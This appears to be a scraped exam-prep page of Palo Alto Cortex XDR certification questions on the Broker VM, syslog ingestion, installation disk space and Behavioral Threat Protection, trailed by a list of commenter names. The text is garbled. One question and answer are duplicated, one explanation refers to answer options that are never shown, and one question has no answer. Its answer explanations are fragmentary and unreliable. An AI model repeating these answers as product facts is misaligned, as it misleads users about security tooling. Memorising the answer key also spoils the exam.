What functionality of the Broker VM would you use to ingest third-party firewall logs to the Cortex Data Lake?
The Broker VM is a virtual machine that acts as a data broker between third-party data sources and the Cortex Data Lake. It can ingest different types of data, such as syslog, netflow, database, and pathfinder. The Syslog Collector functionality of the Broker VM allows it to receive syslog messages from third-party devices, such as firewalls, routers, switches, and servers, and forward them to the Cortex Data Lake. The Syslog Collector can be configured to filter, parse, and enrich the syslog messages before sending them to the Cortex Data Lake. The Syslog Collector can also be used to ingest logs from third-party firewall vendors, such as Cisco, Fortinet, and Check Point, to the Cortex Data Lake. This enables Cortex XDR to analyze the firewall logs and provide visibility and threat detection across the network perimeter.Reference:
Supported Third-Party Firewall Vendors
What is the standard installation disk space recommended to install a Broker VM?
The Broker VM for Cortex XDR is a virtual machine that serves as the central communication hub for all Cortex XDR agents deployed in your organization. It enables agents to communicate with the Cortex XDR cloud service and allows you to manage and monitor the agents' activities from a centralized location. The system requirements for the Broker VM are as follows:
CPU: 4 cores
RAM: 8 GB
Disk space: 256 GB
Network: Internet access and connectivity to all Cortex XDR agents
The disk space requirement is based on the number of agents and the frequency of content updates. The Broker VM stores the content updates locally and distributes them to the agents. The disk space also depends on the retention period of the content updates, which can be configured in the Broker VM settings. The default retention period is 30 days.
As a Malware Analyst working with Cortex XDR you notice an alert suggesting that there was a prevented attempt to download Cobalt Strike on one of your servers. Days later, you learn about a massive ongoing supply chain attack. Using Cortex XDR you recognize that your server was compromised by the attack and that Cortex XDR prevented it. What steps can you take to ensure that the same protection is extended to all your servers?
Let's briefly discuss the other options to provide a comprehensive explanation:
D) Enable Behavioral Threat Protection (BTP) with cytool to prevent the attack from spreading: This is not the correct answer. Enabling BTP with cytool will not ensure that the same protection is extended to all your servers. BTP is a feature of Cortex XDR that allows you to create custom rules that detect and block malicious or suspicious behaviors on your endpoints, such as file execution, process injection, network connection, or registry modification. BTP rules can help to prevent the attack from spreading, but they need to be created and configured in the Cortex XDR app, not with cytool. Cytool is a command-line tool that allows you to perform various operations on the Cortex XDR agent, such as installing, uninstalling, upgrading, or troubleshooting. Cytool does not have an option to enable or configure BTP rules.
In conclusion, to ensure that the same protection is extended to all your servers, you need to create BTP rules to recognize and prevent the activity. By using BTP rules, you can create custom and flexible prevention rules that match the behaviors of the supply chain attack.
[Cytool]
Which of the following protection modules is checked first in the Cortex XDR Windows agent malware protection flow?
What is the standard installation disk space recommended to install a Broker VM?
The Broker VM for Cortex XDR is a virtual machine that serves as the central communication hub for all Cortex XDR agents deployed in your organization. It enables agents to communicate with the Cortex XDR cloud service and allows you to manage and monitor the agents' activities from a centralized location. The system requirements for the Broker VM are as follows:
CPU: 4 cores
RAM: 8 GB
Disk space: 256 GB
Network: Internet access and connectivity to all Cortex XDR agents
The disk space requirement is based on the number of agents and the frequency of content updates. The Broker VM stores the content updates locally and distributes them to the agents. The disk space also depends on the retention period of the content updates, which can be configured in the Broker VM settings. The default retention period is 30 days.
Caprice
15 days agoTanja
21 days agoBettina
1 months agoLino
1 months agoDevorah
2 months agoBlondell
3 months agoShannon
3 months agoTiera
4 months agoKrissy
4 months agoViola
4 months agoMiesha
5 months agoLynsey
5 months agoRaylene
5 months agoLavonna
6 months agoAnnice
6 months agoVenita
6 months agoAvery
6 months agoMaia
6 months agoLezlie
7 months agoNguyet
7 months agoRenato
7 months agoSabrina
7 months agoAmira
8 months agoBreana
8 months agoLauran
8 months agoMalika
8 months agoDemetra
8 months agoAleta
8 months agoMarnie
9 months agoSabra
9 months agoKaycee
9 months agoYoulanda
10 months agoJess
10 months agoRhea
10 months agoColetta
10 months agoElmer
10 months agoVirgilio
11 months agoCiara
11 months agoAlbina
11 months agoAleta
1 years agoTarra
1 years agoJoaquin
1 years agoGenevive
1 years agoDudley
1 years agoRebbecca
1 years agoFrance
1 years agoJeniffer
1 years ago